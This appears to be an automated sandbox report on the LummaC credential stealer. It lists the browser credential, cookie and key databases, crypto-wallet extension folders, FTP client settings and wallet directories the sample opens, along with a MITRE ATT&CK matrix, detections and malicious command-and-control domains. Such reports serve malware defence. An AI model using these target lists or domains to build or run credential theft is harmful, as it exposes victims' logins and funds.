Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior

Source: Yara match	File source: 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	751 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	34 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	223 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Amadey
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
necklacedmny.store	188.114.96.3	true	true	unknown
presticitpo.store	unknown	unknown	true	unknown
thumbystriw.store	unknown	unknown	true	unknown
crisiwarny.store	unknown	unknown	true	unknown
fadehairucw.store	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://necklacedmny.store/api	true	unknown
presticitpo.store	true	unknown
scriptyprefej.store	true	unknown
necklacedmny.store	true	unknown
fadehairucw.store	true	unknown
navygenerayk.store	true	unknown
founpiuer.store	true	unknown
thumbystriw.store	true	unknown
crisiwarny.store	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://necklacedmny.store/:	file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store/z	file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://necklacedmny.store:443/apiK	file.exe, 00000000.00000002.3302511591.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp	false		unknown
